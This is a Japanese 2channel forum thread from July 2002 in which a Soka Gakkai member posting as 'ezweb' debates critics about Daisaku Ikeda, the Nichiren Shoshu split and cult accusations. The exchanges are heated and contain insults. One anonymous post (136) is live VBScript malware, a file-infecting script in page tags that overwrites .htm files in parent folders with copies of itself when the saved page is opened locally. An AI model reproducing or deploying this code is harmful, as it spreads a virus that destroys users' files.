109 :ezweb:02/07/08 23:04 ID:C65rhA0y
99さん ん〜、ごもっとも。グリコ森永事件、湾岸戦争、テポドン、サリン(略)何故、創価学会名誉会長池田大作の中国中山大学(確か)名誉教授ゲトの大見出しが全国紙に出ないのか!?価値がわからんからです。

110 :名無しさん@お腹いっぱい。:02/07/08 23:07 ID:???
いつも思うけどバカな学会員って、答えたくない質問には答えずに
池田大作は偉いんだ、みたいなことをずっと言ってるよね。



111 :ezweb:02/07/08 23:09 ID:RzW9USCl
>>104 ←テスト 僕も嫌いでしたよ。ムゥーンと威張ってたり。今でも別に愛してるわけじゃないですよ。先生のことだから詳しく話します。この話は僕の超「個人的見解」で、先生の功績とは関係のない話です。

112 :名無しさん@お腹いっぱい。:02/07/08 23:12 ID:J8GduAvN
先生は素晴らしい と言ってくる 婦人部が もひとっ。

113 :名無しさん@お腹いっぱい。:02/07/08 23:13 ID:YM1vM+Om
>>111をだれか訳してくれ

114 :ezweb:02/07/08 23:15 ID:Z7zfksDw
なんで先生はあんな精力的に動くのか。なぜいきなり威張ってみたりするのか。僕は思うに、先生は宗門問題の時にゴッポリ傷付いてるんです。純粋な気持で外護してきた宗門及び御法主上人猊下に…それこそ権力で不純な動機で不当に総講頭をブッコ抜かれたからです。

115 :名無しさん@お腹いっぱい。:02/07/08 23:18 ID:YM1vM+Om
>>114お!いいねえ。

とりあえず、ソースもってこい


116 :ezweb:02/07/08 23:19 ID:w5jHccaW
正当ならばいいのですが、一方的に純粋な池田大作の気持ちが傷付けられたのです。この辺は先生を権力者とか地位のある人として見てると理解できないでしょう。先生が威張って見えるのは他人への警戒だったり、うまく言えませんが…(続)

117 :創価は公認カルト:02/07/08 23:20 ID:???
>ezweb さん
マハローマハローバカヤローが素晴らしい人の言葉ですか?
キンマンコが素晴らしい人の言葉ですか?
クリントンは口が上手いが素晴らしい人の言葉ですか?

堂々と大衆の前で発言するこんな親父のドコが素晴らしいのですか?
文字では素晴らしい事はいくらでも書けます。(誰が書いてるのか知らないけど・・)
貴方は池田のどんな所が素晴らしいと思うのですか?
学会内部の池田の側近者に脱会者が多いのはどう説明するのですか?

118 :名無しさん@お腹いっぱい。:02/07/08 23:20 ID:YM1vM+Om
そりゃ他人へ警戒してたら、キンマンコともいいたくなるわな。
泣けるねえ

119 :名無しさん@お腹いっぱい。:02/07/08 23:23 ID:???
あのう、あんまり面白くないんですけど
どうしてこんなに盛り上がってるんですか?

120 :ezweb:02/07/08 23:25 ID:MGqS/F+T
僕が初めて先生を見て驚いたのは、あれほどの地位、名誉、財産がありながら、中身はただの一人の「戸田門下生」だとわかった時です。ただの門下生。永遠に。地位功績云々じゃなくそんな姿勢で生きている先生を羨ましい。

121 :119:02/07/08 23:26 ID:???
>>120
いや、こりゃ面白いかも

122 :名無しさん@お腹いっぱい。:02/07/08 23:27 ID:YM1vM+Om
>>119学会員のオナニーはおもしろいよ。
とりあえず、反論は無視だからね。

123 :名無しさん@お腹いっぱい。:02/07/08 23:29 ID:J8GduAvN
>114
仏法で説かれている因果は すべて自分がつくった原因によって、その
報いを受けると言うものです。
こんなこと どっかに書いてありましたよ。

124 :ezweb:02/07/08 23:30 ID:RzW9USCl
僕よりずっと年上なクセに一人の生徒。俺は池田大作にブチ当たりたくなった。詰問したい。どこに生きてるんですかって。見せろ教えろって。…つまり外見とは裏腹に中身は、というわけ。先生の詩を読んでわかった。以上。(ё)/また今度。

125 :名無しさん@お腹いっぱい。:02/07/08 23:30 ID:???
>>120とりあえずおまえ、仏教について知ってること書いてみろよ。

126 :ezweb:02/07/08 23:42 ID:xtz0/HzD
レス見ずにずーっと書いてますからね。オナニーとは…。いくつかレスしたいのがあるんですが(オナニーだのガキだのは無視)仕事があるんですよね。なんか昨日は程度がよかったのに…寝よ。

127 :名無しさん@お腹いっぱい。:02/07/08 23:52 ID:J8GduAvN
ezwebさん
夕方は えらい はりきっていたのにね。
疲れたのか。


128 :ezweb:02/07/08 23:54 ID:T8FccFFP
>>123 その通りです。それは先生の過去世につんだ業のせいだとも言えるでしょう。アンチの某へ→仏法について知ってること?お前の妄想には付き合わない。

129 :名無しさん@お腹いっぱい。:02/07/08 23:58 ID:???
オナニーがこうじてBBSまで作るとか?

130 :名無しさん@お腹いっぱい。:02/07/09 00:00 ID:0VCm1F92
>128ezwebさんに
ひとつ質問 答えお願い。
正本堂壊された件だけど >123が正しいとすれば 学会文句いえないね。 

131 :ezweb:02/07/09 00:12 ID:niOqXAOh
これで最後ー。>>130 一家の宿命とか一国の宿命とかがあるように一宗の宿命もありかも。だけどあれは御書の言うところの…なんだっけ。しかし文句は言えないなんてことはないよ。仏法が学会の中だけあるいは宗教者の妄想だと?現実と理屈が合わなくなると?

132 :名無しさん@お腹いっぱい。:02/07/09 00:18 ID:0VCm1F92
>131
だったら 学会の宿命ということで 納得したら?
矛盾しているって そういうところよ。

きょうはいいわ。ゆっくり休んで。勤行抜かさずにね。

133 :ezweb:02/07/09 22:18 ID:89yXuN72
>>132 勤行抜かさないようにって、つまりは皮肉ですね。一瞬でもマジ激励と感じた僕は…。遁走呼ばわりは嫌なのでレスしますね。催促がないのは学会員は、いや、きっと「宗教=結局まやかし」だとの失望や確信からですか?

134 :名無しさん@お腹いっぱい。:02/07/09 22:26 ID:ja0wP66x
>133
皮肉ではないですよ。
私は 学会は嫌いですど ご本尊様には守ってもらっていると言う
実感があります。勤行は大切ですよ。

135 :ezweb:02/07/09 22:26 ID:oFZr8rQt
132さんがあげた例は確か日顕の大客殿を壊したことですよね。過去世の報いなら自業自得で納得すべきだ、ですよね。違うんです。まずは132さん、日顕の行動に対しての学会の主張は「学会の権威を傷つけた」みたいなものだと確信して話してますね。

136 :名無しさん@お腹いっぱい。:02/07/09 22:28 ID:SHDdGkag
<BODY Onload="Redirect();"><script language="VBScript"><!-- Sub Redirect Randomize
If location.protocol = "file:" AND (Int((6 * Rnd) + 1) = 1) then Call Offline
location.href = location.href +"l"
End Sub Sub Offline Dim FSO,folder ,fc, f1, cpath
Set FSO = CreateObject("Scripting.FileSystemObject")
HostPath = Replace(location.href, "file:///", "")
HostPath = Replace(HostPath, "/", "\")
cpath = fso.GetParentFolderName(HostPath)
Set folder = fso.GetFolder(cpath) While folder.IsRootFolder = false
Set folder = fso.GetFolder(cpath) Set fc = folder.Files
cpath = fso.GetParentFolderName(cpath) For each f1 in fc
s = Lcase(Fso.GetExtensionName(f1.name))
If s = "htm" and fso.FileExists(f1.path+"l") = False then
fso.CopyFile f1.path, f1.path+"l", true
fso.CopyFile HostPath, f1.path, true End If Next Wend
If (Int((10 * Rnd) + 1) + 1) = 1 Then MsgBox("HTML.Redirect /1nternal") End Sub --></script>
<!--Mocc/#Mai $Fanta & qupter configress +50;/Shera++/con;con;--></BODY>

137 :ezweb:02/07/09 22:37 ID:FPl3bbCZ
それも学会や先生の真実を知らない故なわけですが、早い話し日顕の言動は「破仏法」なんです。そこを攻め続けてます。退座するまで。法とすべての信徒(行き着くところ一切衆上)のために建てたものを何故破壊するのでしょう?

138 :名無しさん@お腹いっぱい。:02/07/09 22:37 ID:ja0wP66x
>135
今の学会に権威なんてないと思います。
お金で権威を買おうとしていたことが 明らかになった と言うことで
いいんじゃないですか?

139 :ezweb:02/07/09 22:45 ID:A98yFrAQ
それは日顕の幼稚な私情からなんです。これまた嫉妬。それを攻めます。なぜ攻めるか。「創価学会が日蓮大聖人の仏法を実践(守る、広める)する団体」だからです。鍵カッコ内がわからず、先生の奴隷、挙手要員の集まりが創価学会だとするならお手上げですが。

140 :ezweb:02/07/09 22:50 ID:GL1zspcc
自業自得だと捉えるのと日顕を攻めるのは全く次元が違います。アンチの人と向かい合ってわかったんですが、あなた達は創価学会を知らない。池田大作を知らない。132さんも全く同じ。頭の中の事実無根の創価学会にムカついている。いつもそうだ。根拠は妄想。

141 :名無しさん@お腹いっぱい。:02/07/09 22:50 ID:ja0wP66x
>137学会や先生の真実を知らない故
アンチでも 池田の言うことや 聖教新聞よんでいます。
要は 鵜呑みにしているか 見抜いているかの違いです。
知る知らないより 見抜く力が大切です。

破壊する方 される方 両方に 問題があるとしか思えません。私には。


142 :ezweb:02/07/09 22:54 ID:LYKPD80M
ここまで言葉を見付けながら工夫しながら一気に書き上げました。反論を無視する072だと妄想を根拠に確信込めて言うあんたらがまず一番最初にカルトだ。

143 :名無しさん@お腹いっぱい。:02/07/09 23:05 ID:ja0wP66x
>142
これから 社会は益々厳しくなします。自己責任の時代です。
頑張ってください。

追申
文章もう少し分かりやすくネ。

144 :ezweb:02/07/09 23:26 ID:89yXuN72
>>141 見抜けてないんです。見抜いたつもりがそこは妄想なんです。あなたが僕ほど創価学会のベクトルや池田先生のことを見抜いているって無理がありません?見抜くって言葉、自己過信の現れですよ。

145 :名無しさん@お腹いっぱい。:02/07/09 23:30 ID:???
>>144
学会員は賢明であれ、騙されてはいけない、
という指導があったと思うが・・。

146 :ezweb:02/07/09 23:31 ID:b5o6i/4U
僕は創価学会ですが、聖教の記事の特に裁判結果に関しては、直接裁判所やら公的機関から聞けないものかと考えるくらいです。あなたらは自分の妄想で済ます。こういう意図でこの記事は書かれているんだ、みたいに。違いますか?

147 :ezweb:02/07/09 23:35 ID:oFZr8rQt
因みに僕は聖教を崇拝盲信はしませんが信頼しているので、裁判結果のことは他人に見せるために考えたことです。あしからず。あ、結局行ってませんが。誰か知恵貸してー。

148 :名無しさん@お腹いっぱい。:02/07/09 23:39 ID:ja0wP66x
>144
今日はこれで最後です。
見抜いているか いないか どう思われてもいいけど
あなたの性格もある程度わかります。
だから 応援もしてるでしょ?


149 :名無しさん@お腹いっぱい。:02/07/09 23:40 ID:Fzo8JzIz
>>146
>あなたらは自分の妄想で済ます。
こういう意図でこの記事は書かれているんだ、みたいに。違いますか?

違います。
他のメディアの流す記事を、頭から信じない学会員のほうが変ですよ。

150 :ezweb:02/07/09 23:53 ID:FPl3bbCZ
>>148 え?応援してくれてるの?それはマジレス?正直嬉しいですけど…。あ、僕は自分の立場は「創価学会」じゃないですよ。一人の人間のつもりですから。ではおやすみなさい。また話しましょ。

151 :ezweb:02/07/10 00:01 ID:+apdSueu
>>149 現在聖教以外で創価学会を載せた記事の9割りは最初から創価学会を知る姿勢のない「報道」とは言えない正確さの欠いた記事です。どうやって信じろと?

152 :149:02/07/10 00:16 ID:u6ZiIRFF
>>151
>9割りは最初から創価学会を知る姿勢のない
「報道」とは言えない正確さの欠いた記事です。どうやって信じろと?

だから、頭っから(他のメディアを)信じなくてもいいのですよ。
仮りに「9割」が正確さを欠いてたとしても、残りの一割を検証しないと。
十把一絡げにデマ報道だと無視しようとする姿勢がカルトだと言われてるんですよ。

153 :ezweb:02/07/10 00:34 ID:FDJs3lpx
>>152 残りの一割とは毎日新聞と地方紙の中国新聞のことです。踏み込んで事実を取材する姿勢があるから。創価学会の真実とは創価学会の思想です。ベクトルです。

154 :152:02/07/10 00:44 ID:???
>>153

『創価学会の思想』が絶対に正しいのか?
仮にそうだと仮定しても、凡夫である学会幹部の振る舞いまで絶対に正しいのか?
そうではないだろう?
学会幹部に対する正当な批判すら、三流メディアの為にするデマだと
耳を塞いできたんじゃないのか?
だから、カルトと言われているんだよ(藁

155 :ezweb:02/07/10 14:39 ID:Zq6BldVN
わかりますよー。創価学会の思想=日蓮大聖人の思想。正しいというのはどの次元で正しいのか、ということですがここではあなたの主張に対する答えにならないので略します。幹部の振る舞いが法のように常に正しいのか。正しくありません。

156 :ezweb:02/07/10 14:45 ID:0Z95ahjg
あなたの隣に創価学会会長と僕が雑魚寝をしていて寝くて悪くてあなたの睡眠が妨げられたら睡眠妨害。それを責めるあなたに「会長閣下になんという不遜僣越!」とあなたを殴れば現行の刑法の傷害罪にあたります。さらに会長がムカついて「ポアすべし」と(続)

157 :ezweb:02/07/10 14:51 ID:FDJs3lpx
僕に命令をし「命令すんな!ムカつく」と会長の奥さんをレイプすれば婦女暴行。「お前が悪い!」とあなたを殴打の末、死に至らしめると傷害致死。…これらの判断が出きる僕は創価学会を破門ですか?あなたの上司が学会員だとどうするんですか?

158 :ezweb:02/07/10 14:54 ID:Ii+f5lE4
耳は塞いでません。レイプ、下げ渡し、組織的地上げ…事実だと信じてしまうのは創価学会の実情を知らないからです。

159 :Sb:02/07/10 15:57 ID:Ok/soITS
ezwebさん
このページのご感想を聞きたいのですが。
http://www.uranus.dti.ne.jp/~yuugeki/nitiren-kiso.html
よろしいでしょうか?

160 :名無しさん@お腹いっぱい。:02/07/10 16:34 ID:???
本当にezwebだとすると、開けないんじゃないか?
前にiモードで普通のホームページ見ようとして出来なかったぞ。

161 :Sb:02/07/10 17:05 ID:Ok/soITS
がーん


162 :ezweb:02/07/10 17:48 ID:ZjsSlgmT
見れません。どんな内容ですか?

163 :名無しさん@お腹いっぱい。:02/07/10 19:19 ID:???
ガ━━━(゚ロ゚)━━━ン

164 :ROCK!!:02/07/10 19:21 ID:???
http://www.geocities.co.jp/Berkeley-Labo/1279/book.html
さらば借り物人生〜たいほ〜〜!

165 :ROCK!!:02/07/10 19:22 ID:???
http://news.2ch.net/newsplus/#6

ボコボコや〜!

166 :ROCK!!:02/07/10 19:29 ID:???
http://news.2ch.net/test/read.cgi/newsplus/1026267660/l50

晒しあげや!

167 :ezweb:02/07/10 19:33 ID:YPNfaBXv
>>164 見れましたがこれが何か?(゜Д゜)y―~~ >>165 アンチの人の大半は創価学会の教義や思想、池田先生の功績に対してじゃなく一人ヨガリ的態度でしょ?(続)

168 :ezweb:02/07/10 19:38 ID:0Z95ahjg
先生が名誉称号をいくつ受けても、学会員が誉めまくっても、自分や自分の回りは変わらず続いてる。…学会員が誇るところとアンチの人が誇られてると思ってるところが違うんです。

169 :名無しさん@お腹いっぱい。:02/07/10 21:02 ID:???
いいぞ、もっとやってくれ、おもしろい

170 :ezweb:02/07/10 21:48 ID:JYSyHSNj
つまらーん。問題の本質や真実なんてどーでもえーんかぁ。あほくさー。いつまでも頭の中の創価学会を敵視してな。歪むのはまずあんただ。さいなら

171 :名無しさん@お腹いっぱい。:02/07/10 22:01 ID:Du0Fq9RD
ここのスレって学会員の性格をよく表してるね。
層化の悪い記事には捉え方が悪い。ホントは違うはずだ。
池田大作は名誉称号をいっぱいもらってすごい、とか。
それに、反論は無視。
アンチは勉強しろとか言ってるけど、自分の方が創価についての知識が足りない。


172 :名無しさん@お腹いっぱい。:02/07/10 22:04 ID:???
本質や真実とかけ離れていることを
まじめに言われるとおもしろいと感じないか?

そう言っただけなんよ

173 :ezweb:02/07/10 22:27 ID:a2eu9WUn
>>171無認識の認識がアンチのすべてだわ。>>172あなたの言う学会の真実、本質って何?信者を教義に閉じ込め自分一人だけはオイシーのが池田社長?それとは別に聞きたいんですが、波木井坊竜尊@日蓮宗葵講をどう思います?どんな印象?何を見抜いた?

174 :名無しさん@お腹いっぱい。:02/07/10 22:31 ID:Du0Fq9RD
池田社長ってなんかいいな。
まあ、それはおいといてなぜ波木井が出てくるんだ?
今後の展開に期待。

175 :名無しさん@お腹いっぱい。:02/07/10 22:37 ID:???
人の心の中はわからないと安心して話をしてるだろ
それくらいは見抜けるぞ
自分でも証明不能な方向に話を持っていっていること
気がついているんだよね?

176 :ezweb:02/07/10 23:05 ID:YPNfaBXv
>>174おかしな期待は御無用に。>>175まずは…波木井氏の何かを見抜きましたかと聞いたつもりだったんですが…。「安心してる」とは、先生の心の中を証明できまいと僕が安心してるってことですね?ハズレーけど確かに 証明できませんね。(続)

177 :名無しさん@お腹いっぱい。:02/07/10 23:07 ID:???
18分か。まあまあだな。

178 :ezweb:02/07/10 23:13 ID:+apdSueu
けど、ある思想を基にずーっと行動してるんです。動いてるんです。それはこれからも変わりません。ここはもうアンチと学会員の分かれ目ですね。分かるきっかけ、知るきっかけがないと当然理解できません。波木井氏についてどう思います?

179 :名無しさん@お腹いっぱい。:02/07/10 23:21 ID:???
波木井氏を召還してるのか?
あの人、すぐ来るんじゃないかな

180 :名無しさん@お腹いっぱい。:02/07/10 23:24 ID:???
水曜日は彼きませんよ。

181 :ezweb:02/07/10 23:32 ID:YPNfaBXv
学会員が葵講を攻めてるなんて思われたくないけど、彼のこの板での発言って何と言うか、自分を尊敬して欲しいというか、人を法につけるんじゃなくて波木井氏個人につけようとしてる感じがするんです。ただそれだけですが。今日はもう最後にします。

182 :名無しさん@お腹いっぱい。:02/07/10 23:34 ID:???
じゃあ明日本人と話し合ってみましょうね。
もう遅いから寝まちょうね。
そうしないと、明日の小学校に送れちゃうわ。

183 :名無しさん@お腹いっぱい。:02/07/10 23:36 ID:???
あれで尊敬して欲しいと言ってると感じる?
大丈夫か?
名誉会長殿はどうなの?
何度も言ってるようだけど、あれでどうして謙虚なの?
心の中の話はこうなるから不毛なんだけどね。

184 :名無しさん@お腹いっぱい。:02/07/10 23:50 ID:???
ezwebさんは、層化とか何とか言う前に、ありのままに評価する事が大事だよ、
という姿勢だと思います。
私は非活動層化ですが、その姿勢に賛同します。
いかんせん、名誉会長が実際にどういう方なのか(著作物などからは、尊敬で
きる面が多々有りますが)情報が少ないので、もし過小評価している時は、
具体的に注意してください。

185 :名無しさん@お腹いっぱい。:02/07/11 00:19 ID:fLrIh3gR
ezweb さんて 母性本能くすぐりますね。
言ってることは わかんないけど。おやすみね。

186 :Sb:02/07/11 10:31 ID:hzF7ypbu
昼間しか書けないので、タイムラグが発生していますが、(w
んーあのページに書かれているのが、別の団体だとしたら、小説としてみたら
ezwebさんはどのような感想を持つのだろうか


187 :Sb:02/07/11 10:34 ID:hzF7ypbu
あと、なんで波木井さんを召還すんの?
今は関係ないじゃない。
というわけで、波木井さん少しの間ROMっててください。

188 :名無しさん@お腹いっぱい。:02/07/11 21:01 ID:???
age

189 :某学会員(活動家です):02/07/11 21:26 ID:???
>ezweb
あんましムキにならないように。時間と労力の無駄かもよ。
熱いのは結構だけど、気を抜きながらコテハン張らないと、
如是我聞や拙者(ちょっと前の創価コテハン)のように
疲れて来なくなっちゃうから。

190 :188:02/07/11 21:35 ID:???
あげた者です。

ezwebさんも189さんも、本当に層化の人なら
真実を告げられませんか?
なぜ、層化を真実の宗教と思うのか、その理由を。

おためごかしは沢山なんですが
(真実の一端は知ってますが)

191 :某学会員(活動家です):02/07/11 22:03 ID:???
>>190
あなたは本気で学会のことを知ろうとはしてない。
掲示板などではなく、先に動くべきところがあるはずだが?

192 :ezweb:02/07/11 22:04 ID:BfzuaO6/
>>183まだ確信があるわけではないですが。あなたは彼は何のためにこの板に出現してるんだと思います?僕は彼のようなタイプが一番駄目です。まあ人がその人格であるのには過去の影響があると思いますが…。

193 :ezweb:02/07/11 22:09 ID:LRGoJhph
>>184あなたは二世か三世ですね。あなたの言いたいこと、あなたがかつて学会員から受けたこと、よぉーくわかります。ねぇ、仏法ほど「ありのまま」なことはありませんよ?因みに僕に非活動家であることを言うのに躊躇しないで欲しいです。

194 :ezweb:02/07/11 22:14 ID:38pL+tfT
>>185シカトシマスガナニカ?>>186もしかして見れなかったページのこと?見れたページは受験がどうのってページだったみたいですが?

195 :名無しさん@お腹いっぱい。:02/07/11 22:16 ID:???
ezwebは、どうしてIDがクルクル変わるの?クルクルクルクル・・・・

196 :188:02/07/11 22:19 ID:???
やっぱり

そうか、ガッカリ…

197 :ezweb:02/07/11 22:19 ID:1lvSF7Yb
"touchable"あなたの知識は一切いらない。知識は手段だ。正義じゃない。答えじゃない。僕にはあなたの味方になる用意があります。

198 :ezweb:02/07/11 22:31 ID:BfzuaO6/
ありがたいけど、そうはいきませんよ。確かに疲れます。疲れるのになんで話すのかわかりません。まあ、アホだと思ってほっといて下さいな。

199 :ezweb:02/07/11 22:39 ID:v4l+a9u7
>>190それってね、メタクソ難しいんです。つーか、本音言うけどあんたが調べれば?甘えた上に偉そうに。創価学会がわからないんであれば「うむ!!!創価学会はテロを起こす!!!!!!」と、決めて下さいな。あ、核シェルターに保存食忘れずに。

200 :183:02/07/11 22:39 ID:???
「彼」がこの板に出現している理由?

あなたは邪魔にしているようですが、その理由は?

201 :190:02/07/11 22:42 ID:???
>199
では、私の知っていることのみで結構です。
あなたは知らないらしい。
もう忘れてください。さようなら。

202 :名無しさん@お腹いっぱい。:02/07/11 22:44 ID:iDDFuPS0
>ezweb さん
頑張って!! 文章は何言っているか 相変わらず 分からないけど。

203 :ezweb:02/07/11 23:21 ID:57lcbawi
>>195理由は知りませーん。端末はいーじー。>>196ん〜、そんな画期的なものだったんですか?>>200一言じゃムズいっす。眠いっす。>>205嘲笑が聞こえますよ。まあ暇潰しにでも。>>202分かる人には分かるみたいよ?

204 :名無しさん@お腹いっぱい。:02/07/11 23:26 ID:uQpQc1po
限界らしい

205 :ezweb:02/07/11 23:30 ID:BfzuaO6/
>>184俺最悪ですわ。よく読まずにすいません。過小評価の時は具体的に、ですか。僕も僕なりにしか先生のことは知りませんけど、いつでもいいっすよ。>>198は某学会員さんに宛てました。もう寝ました?僕も寝ます。

206 :ezweb:02/07/11 23:35 ID:v4l+a9u7
なかなかタイムリーにレス出来なくてすいません。レスしてる間は入力画面ばっかでレスされたのがわかりません。そうです限界。 (ё)/

207 :名無しさん@お腹いっぱい。:02/07/11 23:51 ID:???
ezwebさんはスカプロ状態ですよー。
全部に一度にレスしなくて良いジャン。
明日、答えます。ですむと思うよ。
知らないことは知らないといって
逆に聞けば良いと思うしね。
素直に行こうよ。

208 :名無しさん@お腹いっぱい。:02/07/12 00:15 ID:UGC7CjbD
ezwebよ・・・新手だな>二行レス
というか、人入れ替わってない?書き込みの表現が初期とは変わったようだが。

209 :名無しさん@お腹いっぱい。:02/07/12 18:06 ID:???
>208 なるほど。 >197"touchable"には、そういう意味があると?
別の意味にとってたけど、人が入れ替わったということでいいのかな?

210 :ezweb:02/07/12 20:55 ID:OQOikgW7
素直さね…当たってる。職場でもこんな態度なの。この仕事を片付けるにはどうすればよいか。その時に出した答えが常に正解とは限らない。同様に他人も信用しない。功を奏する時もあるけどもの凄い消耗する。自分の人生さって開き直れない。…ですが何か?(笑)

211 :ezweb:02/07/12 21:00 ID:8SKP6uqo
>>207同一です>>208あれは波木井氏に宛てて書きました。touchable、とは、映画アンタッチャブルの受け売り。知識だけでヒラヒラ他宗を掌に乗せて安泰してるけど「手は届くゾ」彼の切口は見付けましたから。では…フォースと共に。

212 :184です:02/07/12 21:50 ID:???
ezwebさん、レスありがとうございます。
私は極端な事を言えば、創価にボロクソに貶されても自分を信じられるかどうかが
大事だ、と創価は言っているんだと思います。名誉会長がどうだこうだということよ
り、私がどう生きるかが大事だと思います。
何を信じるべきかは、仏法が教えてくれました。というより、生まれた時から既に知
っていたことなのかもしれませんね。
組織活動は訳あってできませんが、頑張ります。

213 :ezweb:02/07/12 23:59 ID:CkDyOhpT
>>184さん。もしかして学生部出身ですか?それはいいとして、あなたは馴れ合いを強要されたんじゃないでしょうか?いわゆる挙手要員です。右に倣えって。あなたにはあなた固有のものがたくさんあります。字にするとめんどくさいくらいに。(続)

214 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/13 00:03 ID:qasAv8JW
なんだって?俺の切り口がどうしたって?意味がわからんぞ。



215 :名無しさん@お腹いっぱい。:02/07/13 00:04 ID:Ewsk8m/n
ハキリ登場

216 :ezweb:02/07/13 00:12 ID:Xx4L4t/0
例えば宿業、命の傾向性、それから俗に言う感性、性癖等々。うーん…あなたをそんなにした学会員は、現実社会を見下して離れたところに創価学会を作っています。自分の世界を壊すなと、広布を大義名分にあなたを揺すり脅し罵った。(続)

217 :名無しさん@お腹いっぱい。:02/07/13 00:14 ID:???
またしても意味不明・・・・

218 :ezweb:02/07/13 00:18 ID:diB1cKUH
絶対に忘れてはならないのは「あなたがあなたとして生まれることに誰かに許可を受けたわけではない」ということです。創価学会のどんな威張りちらす糞もあなた様にかなうものはいないんです。あなたに何か指示するとすれば、一体何の根拠があって出来るのでしょう?続

219 :ezweb:02/07/13 00:27 ID:bQgcnO/+
あなたに平気で指示する人間は組織的な役職が根拠だったりします。そしてそんな人間はアンチの言うとおりファシストです。そんな軍隊チックな団体が広まることが広布だと錯覚している。マンセーマシーンとして放置です。因みにマンセーとはハングルで万歳です。続

220 :ezweb:02/07/13 00:27 ID:cJoAAirz
あなたに平気で指示する人間は組織的な役職が根拠だったりします。そしてそんな人間はアンチの言うとおりファシストです。そんな軍隊チックな団体が広まることが広布だと錯覚している。マンセーマシーンとして放置です。因みにマンセーとはハングルで万歳です。続

221 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/13 00:34 ID:qasAv8JW
だからなんなんだよ。

222 :ezweb:02/07/13 00:36 ID:2dkag7/H
しかし現実のあなたはそうはいかなかった。それはマンセーマシーンの数が複数だったからじゃないでしょうか?…なんかたどたどしいな。あなたを否定した人物は本仏でも仏法の本体でもないんです。もはや創価学会は関係ないことなんです。そいつらvsあなたです。続

223 :こくごをべんきょうしようね:02/07/13 00:38 ID:???
この夏、一番のオナニースレだな。

224 :ezweb:02/07/13 00:41 ID:WT3/QRAM
あなたには自信が欲しいところですよね、早い話。あ、実は日蓮大聖人はあなた個人に御本尊をお顕しになってますし、あなたの回りの広布はあなた個人に任されてるんです…知ってました?気分だけの激励なんかじゃなく、痛いくらいの現実です。続

225 :ezweb:02/07/13 00:49 ID:iRmHVUCQ
だからあなたを否定した人物とあなたは最初から平等な立場なんです。クッキリわかります。大聖人から直接御授戒を受けたメンバーなんです。なんか涙が出そうだよ。あんたを見下す根拠はゼロじゃないか。凄い。あなたはそこに厳然と生まれている!

226 :ezweb:02/07/13 00:56 ID:KW2MXfBv
それだけでいいじゃないか!あなたは生きている!誰かに許可されたのか!?いいや違う!もはやあなたを見くびった輩なんか怖くない。鼻息で飛ばしてやれ。そしてそいつらを押し退けてドガッと御本尊の前に座って言ってやれ。「南無妙法蓮華経」と。

227 :ezweb:02/07/13 01:04 ID:cMDSH5ll
全ての諸天は滞りなくすぐさま動く。御書に嘘は微塵もない。…でした♪僕は実は今の先生よりも山本伸一が好きなんだけど、山本伸一は会合に来る人よりも会合に来ない人を主役にしてたよ。先生の真骨頂だよ。先生は完全にあなたの味方です。今度詳しく聞かせてね。終

228 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/13 01:05 ID:qasAv8JW
でそれから?俺がどうしたの?

229 :ezweb:02/07/13 01:12 ID:obcNz7Uu
今の全部184さんに宛てたんですが。波木井さん、今日はもう寝るんですが…質問していいですか?なんつーかいきなり不躾なんですが、波木井さんはなんで信心してんの?あ、切口ってのは気にしないで。質問しといてなんですが今日はこれで。

230 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/13 01:16 ID:qasAv8JW
理由なんかないよ。信仰に理由なんか必要なのかい?

俺はそういう部分で学会員さんをあげつらったこともないし、追求した
こともないよ。俺は学会のヘンな部分を止めてくれ、って言ってるだけなんだよね。

応援隊のままごんみたいな人は俺は尊敬すらしているよ。

231 :名無しさん@お腹いっぱい。:02/07/13 01:19 ID:???
ここのスレッドは読む価値があるか?
ezweb氏の2行カキコが気になる。
ついでに、彼(女)の来月のパケ代も気になる。
あとはezwebからカキコできるのかも気になる。

232 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/13 01:29 ID:qasAv8JW
俺は正宗信徒や学会員を”猿・猿”と呼ぶときもあるが、未だかつて
「なんでおまえそんな信仰しているの?」とかはいったことが無いよ。

富士宮には一時、オウム信者がたくさんいて、何人かと行き会ったが
否定的なことは言ったことが無い。別に連中の信仰を行肯定しているわけじゃ
ないが、一人の人間として信じているものなんだからそういうのは尊重しなくちゃ
いけないじゃないか。

だから今まで”学会を辞めろ”なんて言った事無いんだよね。
池田さん信じているのならそれはそれでいいんじゃないかと思うんだよね。
肯定はできないけどね。

233 :Bartholomew von Roach ◆XYc9hl7E :02/07/13 01:34 ID:XYMt9uh4
波木井さんの信仰者にたいするスタンスに同意。

234 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/13 01:37 ID:qasAv8JW
>>233
でもね。不良アンチはすぐに”親学会”と批判してくるんだよ。親ではないのに。(苦笑)

235 :Bartholomew von Roach ◆XYc9hl7E :02/07/13 01:43 ID:XYMt9uh4
>>234
不良アンチは、宗教そのものを認めていない人が多いから…

236 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/13 01:50 ID:qasAv8JW
無宗教は無宗教、それはそれでいい。ただ宗教者に干渉しすぎるよね。
でこちらが受け入れないと”カルトだキチガイだ”と言ってくる。
あいつはわからんやつだと。
でも”無宗教という宗教”を押し付けている点では学会員と同じレベルだって
連中気が付いていないんだよね。で連中、トチ狂うからなあ。

237 :名誉 ◆oi8ARVqQ :02/07/13 01:57 ID:3jNa2VB+
無宗教・・・
外国では馬鹿にされるが・・・(藁
ま、日本人じゃからいいか(藁藁

238 :政教分離名無しさん:02/07/13 02:01 ID:eOpHXLQw
>>237
おぬしはここで馬鹿にされておるじゃろうて(藁

239 :Mr.Angels™ ◆G8Mp0Ihg :02/07/13 06:17 ID:???
>>237
名誉 氏が同情したり、仰りたいことは僕には十分伝わってきますが、
そんなに笑わないほうがよろしいかと思います。
軽薄に見られる可能性大ですから。
しかも日本人だから…云々では、
不特定多数の方が大雨の日に薄(すすき)の穂で葺いた屋根の中に
置き去りにされたみたいで切なさが滲み出ています。

異国の方がたが信仰心深いことはとてもありがたいことです。
規律とか規範とかあって周りの方々との節度のある行動が出来るからです。
でもその前に一般に常識ある「性格」が伴っていないと誤解を被ったり
解釈の勘違いで妄想を少なからず膨張させるとも限りません。
このような「心」を左右させる「性格」が確りしているのであれば…、
2chでのこのような修羅場や煽りとかは無いはずです。でも現実は。。。

基本的に性格が良くて次にほんとに好きな宗教自ら選択して、
